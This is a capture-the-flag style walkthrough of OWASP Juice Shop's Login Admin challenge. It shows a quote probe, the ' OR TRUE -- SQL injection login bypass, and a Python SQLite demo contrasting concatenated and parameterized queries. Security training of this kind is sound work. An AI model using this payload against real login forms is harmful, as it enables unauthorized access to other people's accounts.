OWASP Juice Shop — Login Admin Challenge Solution
What is OWASP Juice Shop?
OWASP Juice Shop is a deliberately vulnerable web application for security risk awareness and training. It is an open-source project written in Node.js, Express, and Angular.
OWASP Juice Shop is intended to be the opposite of a best-practice or template application for web developers.
In this tutorial, I am going to demonstrate how to solve challenges in OWASP Juice Shop using basic SQL injection.
Before getting into that, let's look at what SQL injection is.
SQL injection is a common vulnerability in which an attacker supplies input that the server ends up executing as part of a SQL query. When the server-side query is built by inserting the client's input directly into the query string, the attacker can alter the query so that it exposes, modifies, or destroys data in the database.
Juice Shop does not properly validate or parameterize user input before building its SQL queries, which makes SQL injection possible.
How to set up OWASP Juice Shop locally
1. Pull the Juice Shop Docker image
~$ docker pull bkimminich/juice-shop:v8.7.3
2. Start the Juice Shop Docker container
~$ docker run --rm -p 3000:3000 bkimminich/juice-shop:v8.7.3
Now you can access Juice Shop in your browser at http://localhost:3000 (the port published by -p 3000:3000).
Now let us use a SQL injection attack to solve the Login Admin challenge in OWASP Juice Shop.
Login Admin Challenge
The Juice Shop login form is vulnerable to SQL injection, which allows unauthorized access to user accounts.
Let us inject SQL into the email field to bypass authentication and log in as the first user in the database.
First, provoke an error by entering a single quote (') in the email field and any string in the password field (here I used 111).
Check the response in the browser's Network tab. The error message contains the SQL query used for the login:
"SELECT * FROM Users WHERE email = ''' AND password = '698d51a19d8a121ce581499d7b701668' AND deletedAt IS NULL"
The single quote we entered in the email field closed the string literal early and left an unterminated quote behind it, which is what made the database throw the error. Note also that the password does not appear literally: 111 has been MD5-hashed to 698d51a19d8a121ce581499d7b701668 before being placed in the query, so the email field is the usable injection point.
Now that we know the query behind the login, we can send
' OR TRUE --
as the email and any string as the password. The server then builds:
"SELECT * FROM Users WHERE email = '' OR TRUE --' AND password = '698d51a19d8a121ce581499d7b701668' AND deletedAt IS NULL"
- The leading ' closes the email string literal.
- OR is the SQL logical operator.
- TRUE is a boolean literal, so the condition is satisfied for every row.
- -- starts a SQL comment, so everything after it (the password check and the deletedAt IS NULL filter) is ignored by the database.
So the WHERE clause now evaluates email = '' OR TRUE, which is always true, and the password is never checked.
Which user did you log in as?
Because the WHERE clause matches every row, the query returns the whole Users table and the application uses the first row it receives, so this injection logs us in as the first user in the database. You can see that user's details in the login response in the browser's Network tab.
In Juice Shop the first user is the administrator, so now we are logged in as Admin!
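As an added example (not part of the original tutorial and not Juice Shop's own code), the following Python script models the login query above with an in-memory SQLite table. The rows, e-mail addresses and passwords are constructed sample data; only the column names (email, password, deletedAt) and the query shape come from the leaked query. It builds the query by string concatenation with the password MD5-hashed first, replays the single-quote probe and the ' OR TRUE -- bypass (returning the first row, as the application does), and shows the parameterized query that defeats the same payload.

```python
import hashlib
import sqlite3

# Constructed sample data for this demo. The column names come from the query
# shown in the error response; the rows, ids, addresses and passwords are made
# up and are not Juice Shop's seed data.
SAMPLE_USERS = [
    (1, "admin@example.com", "admin123", None),
    (2, "jim@example.com", "ncc-1701", None),
    (3, "bender@example.com", "OhG0dPlease1nsertLiquor!", None),
]


def md5(s: str) -> str:
    """Unsalted MD5 hex digest, the password form seen in the leaked query."""
    return hashlib.md5(s.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """Create an in-memory Users table holding the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Users (id INTEGER PRIMARY KEY, email TEXT, "
        "password TEXT, deletedAt TEXT)"
    )
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?, ?, ?)",
        [(uid, email, md5(pw), deleted) for uid, email, pw, deleted in SAMPLE_USERS],
    )
    return conn


def build_query(email: str, password: str) -> str:
    """Build the login query the insecure way: raw string concatenation."""
    return (
        "SELECT * FROM Users WHERE email = '" + email
        + "' AND password = '" + md5(password)
        + "' AND deletedAt IS NULL"
    )


def login_vulnerable(conn, email, password):
    """Insecure login: run the concatenated query and take the first row."""
    return conn.execute(build_query(email, password)).fetchone()


def login_safe(conn, email, password):
    """Parameterized login: input is bound as data and never parsed as SQL."""
    return conn.execute(
        "SELECT * FROM Users WHERE email = ? AND password = ? AND deletedAt IS NULL",
        (email, md5(password)),
    ).fetchone()


def sql_error_for(conn, email, password):
    """Return the database error text a login attempt triggers, or None."""
    try:
        login_vulnerable(conn, email, password)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


def demo() -> dict:
    """Replay the walkthrough: probe with a quote, then bypass with ' OR TRUE --."""
    conn = build_db()
    return {
        # the tutorial's password 111 hashes to the value seen in the leaked query
        "hash_of_111": md5("111"),
        # a lone quote leaves an unterminated string literal -> database error
        "quote_error": sql_error_for(conn, "'", "111"),
        # the bypass payload turns the WHERE clause into email = '' OR TRUE
        "bypass_query": build_query("' OR TRUE --", "111"),
        # the first row of the table (the admin in this sample) is logged in
        "bypass_user": login_vulnerable(conn, "' OR TRUE --", "111")[1],
        # the same payload against the parameterized query matches nobody
        "safe_bypass": login_safe(conn, "' OR TRUE --", "111"),
        # real credentials still work with the parameterized query
        "safe_valid": login_safe(conn, "jim@example.com", "ncc-1701")[1],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it with python3: the quote probe yields a database error instead of a row, the bypass payload returns the first user, and the same payload against the parameterized query returns nothing while valid credentials still log in. Because the password is hashed before it reaches the query, injecting into the password field cannot work; the email field is the only usable injection point.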